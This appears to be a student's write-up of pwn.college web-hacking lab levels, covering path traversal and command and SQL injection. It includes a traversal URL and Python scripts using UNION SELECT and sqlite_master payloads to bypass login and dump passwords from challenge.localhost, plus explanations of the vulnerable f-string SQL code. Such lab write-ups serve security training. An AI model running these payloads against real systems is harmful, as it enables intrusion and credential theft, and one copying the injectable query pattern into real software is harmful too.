PWN COLLGE Web Hacking

Level 1

First run the challenge from /challenge

Now try path traversal with path argument

http://challenge.localhost/?path=../../flag

Level 2

Exploit a command injection vulnerability

Start the challenge

the semicolon at the end ensures that the shell knows the command sequence is complete.

Level 3

Exploit an authentication bypass vulnerability

Level 4

Exploit a structured query language injection vulnerability to login

Doing it with python

form = { "username" : 'flag" --', "password" : "idk", }
response = requests.post("http://challenge.localhost/", data=form)
print(response,"\n",response.text)

Level 5

Exploit a structured query language injection vulnerability to leak data

Code Breakdown

1. Fetching the Query Parameter:

   Copy

   pythonCopy codequery = request.args.get("query", "%")

   This line retrieves a query parameter from the URL's query string. If query is not provided, it defaults to %, which is a wildcard in SQL's LIKE clause.

2. Executing the SQL Query:

   Copy

   pythonCopy codeusers = db.execute(f'SELECT username FROM users WHERE username LIKE "{query}"').fetchall()

   This line constructs a SQL query using the query parameter. Since it directly inserts the query parameter into the SQL statement, it is vulnerable to SQL injection.

3. Returning the Results:

   Copy

   pythonCopy codereturn "".join(f'{user["username"]}\n' for user in users)

   This line formats and returns the results of the query, joining all usernames with newline characters.

Exploiting SQL Injection

To exploit the SQL injection vulnerability, you can manipulate the query parameter to include SQL commands that alter the behavior of the query. Here's how you can do it:

1. Leak All Usernames:

   By using the % wildcard in the LIKE clause, you can match all usernames:

   URL:

   Copy

   perlCopy codehttp://example.com/path?query=%25

   This constructs the following SQL query:

   Copy

   sqlCopy codeSELECT username FROM users WHERE username LIKE "%"

   Since % matches any string, this will return all usernames in the users table.

and then we can append Union to dump all passwords

import requests 

params = {"query" : '" UNION SELECT password from USERS --'} 

response = requests.post("http://challenge.localhost/", params=params) 

print(response.text.strip())

Level 6

Exploit a structured query language injection vulnerability with an unknown database structure.

• Table Creation:

  Copy

  pythonCopy codetable_name = f"table{hash(flag) & 0xFFFFFFFFFFFFFFFF}"
  db.execute((f"CREATE TABLE IF NOT EXISTS {table_name} AS "
              'SELECT "flag" AS username, ? AS password'),
             (flag,))

  • The code first creates a table with a name based on a hash of the flag. The hash ensures the table name is unique and difficult to guess.

  • The table contains a single row with "flag" as the username and the actual flag value as the password.

• Query Parameter Handling:

  Copy

  pythonCopy codequery = request.args.get("query", "%")

  • The query parameter is retrieved from the URL's query string. If query is not provided, it defaults to %, which is a wildcard in SQL's LIKE clause.

• SQL Query Execution:

  Copy

  pythonCopy codeusers = db.execute(f'SELECT username FROM {table_name} WHERE username LIKE "{query}"').fetchall()

  • This line constructs and executes a SQL query to select usernames from the dynamically named table where the username matches the query parameter.

• Returning the Results:

  Copy

  pythonCopy codereturn "".join(f'{user["username"]}\n' for user in users)

  • The code joins all the retrieved usernames with newline characters and returns them as a response.

import requests 

params = {"query": '" UNION SELECT tbl_name from sqlite_master --'} 

response = requests.post("http://challenge.localhost/", params=params) 

t_name = response.text.strip()

params = {"query": f'" UNION SELECT password from {t_name} --' }

response = requests.post("http://challenge.localhost/", params=params) 

print(response.text.strip())